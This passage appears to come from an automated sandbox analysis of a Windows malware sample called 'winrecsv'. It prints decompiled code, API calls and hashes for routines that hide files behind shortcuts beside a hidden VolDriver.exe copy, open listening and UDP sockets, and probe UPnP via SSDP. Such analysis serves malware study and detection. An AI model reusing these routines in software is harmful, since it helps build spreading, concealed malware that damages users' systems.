                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404D2F
                                                                                  • CopyFileW.KERNEL32(00414418,?,00000000), ref: 00404D47
                                                                                  • SetFileAttributesW.KERNEL32(?,00000002), ref: 00404D5A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$wsprintf$ExistsPath$Attributes$CopyCreateDeleteDirectory_chkstk
                                                                                  • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDriver.exe$%s\*$shell32.dll$shell32.dll
                                                                                  • API String ID: 3833403615-1812021906
                                                                                  • Opcode ID: 62579ddd412223121d61bd6eea2e6a24c3e94b8aea53340661bac94d9f0a3f90
                                                                                  • Instruction ID: 56dfbe622999f3f4d946997a069b2a92ca57c1f224be27ae97978ead2f5811f9
                                                                                  • Opcode Fuzzy Hash: 62579ddd412223121d61bd6eea2e6a24c3e94b8aea53340661bac94d9f0a3f90
                                                                                  • Instruction Fuzzy Hash: BBD170B4900219AFCB20DF60DC44BEA77B8BF44304F0485E9F609A6290D7B99BD4CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 417 404a90-404adf CreateDirectoryW wsprintfW FindFirstFileW 418 404ae5-404af9 lstrcmpW 417->418 419 404bbf-404bc2 417->419 420 404b11 418->420 421 404afb-404b0f lstrcmpW 418->421 423 404b8c-404ba2 FindNextFileW 420->423 421->420 422 404b13-404b5c wsprintfW * 2 421->422 424 404b76-404b86 MoveFileExW 422->424 425 404b5e-404b74 call 404a90 422->425 423->418 426 404ba8-404bb9 FindClose RemoveDirectoryW 423->426 424->423 425->423 426->419
                                                                                  C-Code - Quality: 100%
                                                                                  			E00404A90(WCHAR* _a4, char _a8) {
                                                                                  				short _v524;
                                                                                  				struct _WIN32_FIND_DATAW _v1116;
                                                                                  				void* _v1120;
                                                                                  				short _v1644;
                                                                                  				short _v2164;
                                                                                  				void* _t29;
                                                                                  				void* _t60;
                                                                                  				void* _t61;
                                                                                  				char* _t1; // decompiler temporary for &_a8 (was used undeclared below)
                                                                                  				char* _t14; // decompiler temporary for &_a8 (was used undeclared below)
                                                                                  				_t1 =  &_a8; // 0x40505b
                                                                                  				CreateDirectoryW( *_t1, 0);
                                                                                  				wsprintfW( &_v524, L"%s\\*", _a4);
                                                                                  				_t61 = _t60 + 0xc;
                                                                                  				_t29 = FindFirstFileW( &_v524,  &_v1116);
                                                                                  				_v1120 = _t29;
                                                                                  				if(_v1120 == 0xffffffff) {
                                                                                  					return _t29;
                                                                                  				} else {
                                                                                  					goto L1;
                                                                                  				}
                                                                                  				do {
                                                                                  					L1:
                                                                                  					if(lstrcmpW( &(_v1116.cFileName), ".") != 0 && lstrcmpW( &(_v1116.cFileName), L"..") != 0) {
                                                                                  						wsprintfW( &_v1644, L"%s\\%s", _a4,  &(_v1116.cFileName));
                                                                                  						_t14 =  &_a8; // 0x40505b
                                                                                  						wsprintfW( &_v2164, L"%s\\%s",  *_t14,  &(_v1116.cFileName));
                                                                                  						_t61 = _t61 + 0x20;
                                                                                  						if((_v1116.dwFileAttributes & 0x00000010) == 0) {
                                                                                  							MoveFileExW( &_v1644,  &_v2164, 9);
                                                                                  						} else {
                                                                                  							E00404A90( &_v1644,  &_v2164);
                                                                                  							_t61 = _t61 + 8;
                                                                                  						}
                                                                                  					}
                                                                                  				} while (FindNextFileW(_v1120,  &_v1116) != 0);
                                                                                  				FindClose(_v1120);
                                                                                  				return RemoveDirectoryW(_a4);
                                                                                  			}

                                                                                  APIs
                                                                                  • CreateDirectoryW.KERNEL32([P@,00000000), ref: 00404A9F
                                                                                  • wsprintfW.USER32 ref: 00404AB5
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00404ACC
                                                                                  • lstrcmpW.KERNEL32(?,00411594), ref: 00404AF1
                                                                                  • lstrcmpW.KERNEL32(?,00411598), ref: 00404B07
                                                                                  • wsprintfW.USER32 ref: 00404B2A
                                                                                  • wsprintfW.USER32 ref: 00404B4A
                                                                                  • MoveFileExW.KERNEL32(?,?,00000009), ref: 00404B86
                                                                                  • FindNextFileW.KERNEL32(000000FF,?), ref: 00404B9A
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00404BAF
                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00404BB9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                  • String ID: %s\%s$%s\%s$%s\*$[P@
                                                                                  • API String ID: 92872011-505645206
                                                                                  • Opcode ID: b47613f4efcc78fc372a5197ceb720a83a34bcc65ffc30f7c0cf28f594637780
                                                                                  • Instruction ID: 4312a352e9e7f9f4b9df3eadcbdfd99b35f9a62cedde5f9254868b67503f5fd5
                                                                                  • Opcode Fuzzy Hash: b47613f4efcc78fc372a5197ceb720a83a34bcc65ffc30f7c0cf28f594637780
                                                                                  • Instruction Fuzzy Hash: 5D3178B5900218ABCB10DBA0DC88FEA7778AB88311F40C599F709A7155DB75EAC4CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 553 40eea0-40eeb2 call 408e40 556 40f026-40f02a 553->556 557 40eeb8-40eef0 GetSystemInfo InitializeCriticalSection CreateEventA 553->557 558 40eef6-40ef09 CreateIoCompletionPort 557->558 559 40f01f-40f024 call 40e480 557->559 558->559 560 40ef0f-40ef19 call 40bea0 558->560 559->556 560->559 565 40ef1f-40ef37 WSASocketA 560->565 565->559 566 40ef3d-40efa0 setsockopt htons bind 565->566 566->559 567 40efa6-40efb8 listen 566->567 567->559 568 40efba-40efc5 WSACreateEvent 567->568 568->559 569 40efc7-40efd7 WSAEventSelect 568->569 569->559 570 40efd9-40efdf 569->570 571 40efe1-40effd call 40bf50 570->571 572 40efff-40f01e call 40bf50 570->572 571->572
                                                                                  C-Code - Quality: 45%
                                                                                  			E0040EEA0(void* __esi) {
                                                                                  				struct _SYSTEM_INFO _v36;
                                                                                  				short _v40;
                                                                                  				char _v77;
                                                                                  				short _v82;
                                                                                  				short _v86;
                                                                                  				short _v90;
                                                                                  				short _v92;
                                                                                  				short _v94;
                                                                                  				short _v96;
                                                                                  				short _v98;
                                                                                  				char _v100;
                                                                                  				void* __edi;
                                                                                  				intOrPtr* _t30;
                                                                                  				void* _t33;
                                                                                  				void* _t36;
                                                                                  				intOrPtr _t37;
                                                                                  				short _t39;
                                                                                  				intOrPtr _t40;
                                                                                  				int _t45; // processor count temporary (was used undeclared below)
                                                                                  				intOrPtr* _t54;
                                                                                  				void* _t56;
                                                                                  				void* _t58;
                                                                                  				void* _t59;
                                                                                  
                                                                                  				_t30 = E00408E40(0x4c);
                                                                                  				_t54 = _t30;
                                                                                  				_t59 = _t58 + 4;
                                                                                  				if(_t54 == 0) {
                                                                                  					return _t30;
                                                                                  				} else {
                                                                                  					 *_t54 = 0x494f4350;
                                                                                  					GetSystemInfo( &_v36);
                                                                                  					_t45 = _v36.dwNumberOfProcessors;
                                                                                  					_t3 = _t54 + 0x20; // 0x20
                                                                                  					 *((intOrPtr*)(_t54 + 4)) = _v36.dwNumberOfProcessors + _t45;
                                                                                  					InitializeCriticalSection(_t3);
                                                                                  					_t33 = CreateEventA(0, 1, 0, 0);
                                                                                  					 *(_t54 + 0x10) = _t33;
                                                                                  					if(_t33 == 0) {
                                                                                  						L12:
                                                                                  						E0040E480(_t54);
                                                                                  						return 0;
                                                                                  					}
                                                                                  					_t36 = CreateIoCompletionPort(0xffffffff, 0, 0, 0);
                                                                                  					 *(_t54 + 8) = _t36;
                                                                                  					if(_t36 == 0) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					_t37 = E0040BEA0(_t45);
                                                                                  					 *((intOrPtr*)(_t54 + 0xc)) = _t37;
                                                                                  					if(_t37 == 0) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__WSASocketA(2, 1, 6, 0, 0, 1);
                                                                                  					 *((intOrPtr*)(_t54 + 0x14)) = _t37;
                                                                                  					if(_t37 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					_v77 = 1;
                                                                                  					setsockopt(_t37, 0xffff, 4,  &_v77, 1); // ws2_32 ordinal #21; SOL_SOCKET (0xffff), SO_REUSEADDR (4)
                                                                                  					_v94 = 0;
                                                                                  					_v90 = 0;
                                                                                  					_v86 = 0;
                                                                                  					_v82 = 0;
                                                                                  					_t39 = _v40;
                                                                                  					_v96 = 2;
                                                                                  					_v92 = _t39;
                                                                                  					htons(_v36.dwOemId); // ws2_32 ordinal #9; result lands in _t39 per the decompiler's register model
                                                                                  					_v98 = _t39;
                                                                                  					_t40 =  *((intOrPtr*)(_t54 + 0x14));
                                                                                  					bind(_t40,  &_v100, 0x10); // ws2_32 ordinal #2; sockaddr_in built in _v100.._v82 above
                                                                                  					if(_t40 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					listen( *((intOrPtr*)(_t54 + 0x14)), 0x7fffffff); // ws2_32 ordinal #13
                                                                                  					if(_t40 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__WSACreateEvent();
                                                                                  					 *((intOrPtr*)(_t54 + 0x18)) = _t40;
                                                                                  					if(_t40 == 0) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__WSAEventSelect( *((intOrPtr*)(_t54 + 0x14)), _t40, 8);
                                                                                  					if(_t40 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					_t56 = 0;
                                                                                  					if( *((intOrPtr*)(_t54 + 4)) > 0) {
                                                                                  						do {
                                                                                  							E0040BF50( *((intOrPtr*)(_t54 + 0xc)), 0, E0040EDD0, _t54, 0, 0);
                                                                                  							_t56 = _t56 + 1;
                                                                                  							_t59 = _t59 + 0x18;
                                                                                  						} while (_t56 <  *((intOrPtr*)(_t54 + 4)));
                                                                                  					}
                                                                                  					E0040BF50( *((intOrPtr*)(_t54 + 0xc)), 0, E0040E7A0, _t54, 0, 0);
                                                                                  					return _t54;
                                                                                  				}
                                                                                  			}
Instruction addresses (one per decompiled statement, in listing order):
0x0040eea6, 0x0040eeab, 0x0040eead, 0x0040eeb2, 0x0040f02a, 0x0040eeb8, 0x0040eebd, 0x0040eec3, 0x0040eec9, 0x0040eecd, 0x0040eed4, 0x0040eed7, 0x0040eee5, 0x0040eeeb, 0x0040eef0, 0x0040f01f, 0x0040f01f, 0x00000000, 0x0040f024, 0x0040eefe, 0x0040ef04, 0x0040ef09, 0x00000000, 0x00000000, 0x0040ef0f, 0x0040ef14, 0x0040ef19, 0x00000000, 0x00000000, 0x0040ef2b, 0x0040ef31, 0x0040ef37, 0x00000000, 0x00000000, 0x0040ef4c, 0x0040ef51, 0x0040ef5d, 0x0040ef61, 0x0040ef65, 0x0040ef69, 0x0040ef6e, 0x0040ef78, 0x0040ef7d, 0x0040ef81, 0x0040ef8d, 0x0040ef92, 0x0040ef97, 0x0040efa0, 0x00000000, 0x00000000, 0x0040efaf, 0x0040efb8, 0x00000000, 0x00000000, 0x0040efba, 0x0040efc0, 0x0040efc5, 0x00000000, 0x00000000, 0x0040efce, 0x0040efd7, 0x00000000, 0x00000000, 0x0040efda, 0x0040efdf, 0x0040efe1, 0x0040eff1, 0x0040eff6, 0x0040eff7, 0x0040effa, 0x0040efe1, 0x0040f00f, 0x0040f01e, 0x0040f01e

                                                                                  APIs
                                                                                  • GetSystemInfo.KERNEL32(?), ref: 0040EEC3
                                                                                  • InitializeCriticalSection.KERNEL32(00000020), ref: 0040EED7
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040EEE5
                                                                                  • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040EEFE
                                                                                    • Part of subcall function 0040BEA0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040BEBE
                                                                                  • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 0040EF2B
                                                                                  • setsockopt.WS2_32 ref: 0040EF51
                                                                                  • htons.WS2_32(?), ref: 0040EF81
                                                                                  • bind.WS2_32(?,00000004,00000010), ref: 0040EF97
                                                                                  • listen.WS2_32(?,7FFFFFFF), ref: 0040EFAF
                                                                                  • WSACreateEvent.WS2_32 ref: 0040EFBA
                                                                                  • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040EFCE
                                                                                    • Part of subcall function 0040BF50: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040BF74
                                                                                    • Part of subcall function 0040BF50: CreateThread.KERNEL32 ref: 0040BFCF
                                                                                    • Part of subcall function 0040BF50: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C00C
                                                                                    • Part of subcall function 0040BF50: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040C017
                                                                                    • Part of subcall function 0040BF50: DuplicateHandle.KERNEL32(00000000), ref: 0040C01E
                                                                                    • Part of subcall function 0040BF50: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040C032
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 1603358586-0
                                                                                  • Opcode ID: 3a48ff714123f67728488ebd241aa5cbce844eebc6b7f1e346220b8f1150fb3f
                                                                                  • Instruction ID: 70d9824073996a0ff4c6e74931008e54e86ddc456e6e2338b5ab093a1f0703e2
                                                                                  • Opcode Fuzzy Hash: 3a48ff714123f67728488ebd241aa5cbce844eebc6b7f1e346220b8f1150fb3f
                                                                                  • Instruction Fuzzy Hash: DD41A470240702BFD3209F64DC4AF5AB7A5BF88710F108A3AF668E66D1D7B4E454C799
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040C94A
                                                                                  • htons.WS2_32(0000076C), ref: 0040C980
                                                                                  • inet_addr.WS2_32(239.255.255.250), ref: 0040C98F
                                                                                  • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C9AD
                                                                                    • Part of subcall function 00409880: htons.WS2_32(00000050), ref: 004098AD
                                                                                    • Part of subcall function 00409880: socket.WS2_32(00000002,00000001,00000000), ref: 004098CD
                                                                                    • Part of subcall function 00409880: connect.WS2_32(000000FF,?,00000010), ref: 004098E6
                                                                                    • Part of subcall function 00409880: getsockname.WS2_32(000000FF,?,00000010), ref: 00409918
                                                                                  • bind.WS2_32(000000FF,?,00000010), ref: 0040C9E3
                                                                                  • lstrlenA.KERNEL32(004105A0,00000000,?,00000010), ref: 0040C9FC
                                                                                  • sendto.WS2_32(000000FF,004105A0,00000000), ref: 0040CA0B
                                                                                  • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040CA25
                                                                                    • Part of subcall function 0040C840: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C88E
                                                                                    • Part of subcall function 0040C840: Sleep.KERNEL32(000003E8), ref: 0040C89E
                                                                                    • Part of subcall function 0040C840: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C8BB
                                                                                    • Part of subcall function 0040C840: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C8D1
                                                                                    • Part of subcall function 0040C840: StrChrA.SHLWAPI(?,0000000D), ref: 0040C8FE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                  • String ID: 239.255.255.250
                                                                                  • API String ID: 726339449-2186272203
                                                                                  • Opcode ID: f43b03ae6e4f538bd75ce9ea370b17764c9772fec20ce54065493977abab1f4b
                                                                                  • Instruction ID: b865f0e7113cd30ffca57b294248847536cf2bc14de9108ff1861f92315d7120
                                                                                  • Opcode Fuzzy Hash: f43b03ae6e4f538bd75ce9ea370b17764c9772fec20ce54065493977abab1f4b
                                                                                  • Instruction Fuzzy Hash: D241F8B4E10209EFDB04DFE4D889BEEBBB5EF48304F108169E905B7290D7B55A44CB69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 44%
                                                                                  			E0040DC40(intOrPtr __edi, void* __esi) {
                                                                                  				short _v8;
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				short _v22;
                                                                                  				short _v24;
                                                                                  				short _v26;
                                                                                  				short _v28;
                                                                                  				short _v30;
                                                                                  				char _v33;
                                                                                  				char _v52;
                                                                                  				void* __ebx;
                                                                                  				void* _t21;
                                                                                  				short _t24;
                                                                                  				void* _t25;
                                                                                  				void* _t30;
                                                                                  				void* _t31;
                                                                                  				intOrPtr _t38;
                                                                                  				void* _t39;
                                                                                  
                                                                                  				_t39 = __esi;
                                                                                  				_t38 = __edi;
                                                                                  				if(__esi == 0 || __edi == 0) {
                                                                                  					return 0;
                                                                                  				} else {
                                                                                  					_t31 = E00408E40(0x24);
                                                                                  					 *_t31 = 0x756470;
                                                                                  					 *(_t31 + 4) = 0;
                                                                                  					_t21 = CreateEventA(0, 1, 0, 0);
                                                                                  					 *(_t31 + 0x10) = _t21;
                                                                                  					__imp__#23(2, 2, 0x11, _t30);
                                                                                  					 *(_t31 + 8) = _t21;
                                                                                  					if(_t21 == 0xffffffff) {
                                                                                  						E0040E0A0(_t31, __edi);
                                                                                  						_t31 = 0;
                                                                                  					}
                                                                                  					if(_t31 == 0) {
                                                                                  						L8:
                                                                                  						return _t31;
                                                                                  					}
                                                                                  					_v26 = 0;
                                                                                  					_v22 = 0;
                                                                                  					_v18 = 0;
                                                                                  					_v14 = 0;
                                                                                  					_t24 = _v8;
                                                                                  					_v24 = _t24;
                                                                                  					_v28 = 2;
                                                                                  					__imp__#9(_t39);
                                                                                  					_v30 = _t24;
                                                                                  					_v33 = 1;
                                                                                  					_t25 =  *(_t31 + 8);
                                                                                  					__imp__#21(_t25, 0xffff, 4,  &_v33, 1);
                                                                                  					__imp__#2( *(_t31 + 8),  &_v52, 0x10);
                                                                                  					if(_t25 != 0xffffffff) {
                                                                                  						 *((intOrPtr*)(_t31 + 0xc)) = _t38;
                                                                                  						 *((intOrPtr*)(_t31 + 0x14)) = CreateThread(0, 0, E0040DE70, _t31, 0, 0);
                                                                                  						goto L8;
                                                                                  					}
                                                                                  					E0040E0A0(_t31, _t38);
                                                                                  					return 0;
                                                                                  				}
                                                                                  			}
Instruction addresses (one per decompiled statement, in listing order):
0x0040dc40, 0x0040dc40, 0x0040dc48, 0x0040dd34, 0x0040dc56, 0x0040dc65, 0x0040dc6b, 0x0040dc71, 0x0040dc78, 0x0040dc84, 0x0040dc87, 0x0040dc8d, 0x0040dc93, 0x0040dc95, 0x0040dc9a, 0x0040dc9a, 0x0040dc9e, 0x0040dd2e, 0x00000000, 0x0040dd30, 0x0040dca6, 0x0040dcaa, 0x0040dcae, 0x0040dcb2, 0x0040dcb7, 0x0040dcc1, 0x0040dcc5, 0x0040dcca, 0x0040dcd9, 0x0040dcde, 0x0040dce3, 0x0040dcec, 0x0040dcfd, 0x0040dd06, 0x0040dd22, 0x0040dd2b, 0x00000000, 0x0040dd2b, 0x0040dd08, 0x0040dd13, 0x0040dd13

                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040DC78
                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040DC87
                                                                                  • htons.WS2_32(00009E34), ref: 0040DCCA
                                                                                  • setsockopt.WS2_32(?,0000FFFF), ref: 0040DCEC
                                                                                  • bind.WS2_32(?,00000004,00000010), ref: 0040DCFD
                                                                                    • Part of subcall function 0040E0A0: SetEvent.KERNEL32(?,00009E34,0040DD0D), ref: 0040E0B1
                                                                                    • Part of subcall function 0040E0A0: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040E0BD
                                                                                    • Part of subcall function 0040E0A0: CloseHandle.KERNEL32(?), ref: 0040E0C7
                                                                                  • CreateThread.KERNEL32 ref: 0040DD25
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                  • String ID:
                                                                                  • API String ID: 4174406920-0
                                                                                  • Opcode ID: a2cb8cc6186e6c3a51c62c868e61c9eae69381ded1f00a42377871376424311b
                                                                                  • Instruction ID: e4b1bb25e16b1a4212620234c740e3462210c18eb357fd28b9ad958c2a756cf5
                                                                                  • Opcode Fuzzy Hash: a2cb8cc6186e6c3a51c62c868e61c9eae69381ded1f00a42377871376424311b
                                                                                  • Instruction Fuzzy Hash: B0219FB4644301AEE710DFB48C8AB5B76A0AF48710F50897EFA54DE2C1D7F8C848876A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 58%
                                                                                  			E0040B8F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				char _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				intOrPtr _t38;
                                                                                  				intOrPtr _t43;
                                                                                  
                                                                                  				_v12 = _a16;
                                                                                  				if(_a16 != 0xffffffff) {
                                                                                  					_v12 = GetTickCount() + _v12;
                                                                                  				}
                                                                                  				_v8 = _a8;
                                                                                  				while(1) {
                                                                                  					_v16 = 0;
                                                                                  					_t38 = _a4;
                                                                                  					__imp__#10(_t38, 0x4004667f,  &_v16);
                                                                                  					if(_t38 == 0xffffffff) {
                                                                                  						break;
                                                                                  					}
                                                                                  					if(_v16 > 0) {
                                                                                  						if(_v16 >= _a12) {
                                                                                  							_v24 = _a12;
                                                                                  						} else {
                                                                                  							_v24 = _v16;
                                                                                  						}
                                                                                  						_t43 = _a4;
                                                                                  						__imp__#16(_t43, _v8, _v24, 0);
                                                                                  						_v20 = _t43;
                                                                                  						if(_v20 > 0) {
                                                                                  							if(_a16 != 0xffffffff) {
                                                                                  								_v12 = GetTickCount() + _a16;
                                                                                  							}
                                                                                  							_a12 = _a12 - _v20;
                                                                                  							_v8 = _v8 + _v20;
                                                                                  						}
                                                                                  					}
                                                                                  					Sleep(1);
                                                                                  					if(GetTickCount() > _v12 || _a12 == 0) {
                                                                                  						L15:
                                                                                  						return 0 | _a12 == 0x00000000;
                                                                                  					} else {
                                                                                  						continue;
                                                                                  					}
                                                                                  				}
                                                                                  				goto L15;
                                                                                  			}
                                                                                  Instruction addresses (per decompiled line, column spilled by extraction): 0x0040b8f9 0x0040b900 0x0040b90b 0x0040b90b 0x0040b911 0x0040b914 0x0040b914 0x0040b924 0x0040b928 0x0040b931 0x00000000 0x00000000 0x0040b939 0x0040b941 0x0040b94e 0x0040b943 0x0040b946 0x0040b946 0x0040b95b 0x0040b95f 0x0040b965 0x0040b96c 0x0040b972 0x0040b97d 0x0040b97d 0x0040b986 0x0040b98f 0x0040b98f 0x0040b96c 0x0040b994 0x0040b9a3 0x0040b9af 0x0040b9bb 0x00000000 0x00000000 0x00000000 0x0040b9a3 0x00000000

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 0040B902
                                                                                  • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040B928
                                                                                  • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040B95F
                                                                                  • GetTickCount.KERNEL32 ref: 0040B974
                                                                                  • Sleep.KERNEL32(00000001), ref: 0040B994
                                                                                  • GetTickCount.KERNEL32 ref: 0040B99A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick$Sleepioctlsocketrecv
                                                                                  • String ID:
                                                                                  • API String ID: 107502007-0
                                                                                  • Opcode ID: 57e4b55e86ac30973883d8742beb8e663d4481874e8f35f8e3ef745012922632
                                                                                  • Instruction ID: b5ebabbcfa87b5d5b6093c606dafa0a0568610fd24292d9ee39f828ceab0bc2d
                                                                                  • Opcode Fuzzy Hash: 57e4b55e86ac30973883d8742beb8e663d4481874e8f35f8e3ef745012922632
                                                                                  • Instruction Fuzzy Hash: 2831F0B4900209DFCB04DFA8D948BEE7BB1FF44315F108669E915A3390D7749A90CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 16%
                                                                                  			E00409880() {
                                                                                  				intOrPtr _v8;
                                                                                  				short _v10;
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				intOrPtr _v20;
                                                                                  				short _v22;
                                                                                  				char _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				short _v30;
                                                                                  				short _v34;
                                                                                  				short _v38;
                                                                                  				intOrPtr _v40;
                                                                                  				short _v42;
                                                                                  				char _v44;
                                                                                  				char _v48;
                                                                                  				intOrPtr _t28;
                                                                                  				char* _t30;
                                                                                  
                                                                                  				_v8 = 0xffffffff;
                                                                                  				_v24 = 0;
                                                                                  				_v22 = 0;
                                                                                  				_v18 = 0;
                                                                                  				_v14 = 0;
                                                                                  				_v10 = 0;
                                                                                  				_v24 = 2;
                                                                                  				__imp__#9(0x50);
                                                                                  				_v22 = 0;
                                                                                  				_t28 = E00409840("www.update.microsoft.com");
                                                                                  				_v20 = _t28;
                                                                                  				__imp__#23(2, 1, 0);
                                                                                  				_v28 = _t28;
                                                                                  				if(_v28 != 0xffffffff) {
                                                                                  					_t30 =  &_v24;
                                                                                  					__imp__#4(_v28, _t30, 0x10);
                                                                                  					if(_t30 == 0) {
                                                                                  						_v44 = 0;
                                                                                  						_v42 = 0;
                                                                                  						_v38 = 0;
                                                                                  						_v34 = 0;
                                                                                  						_v30 = 0;
                                                                                  						_v48 = 0x10;
                                                                                  						__imp__#6(_v28,  &_v44,  &_v48);
                                                                                  						_v8 = _v40;
                                                                                  					}
                                                                                  					E00409940(_v28);
                                                                                  				}
                                                                                  				return _v8;
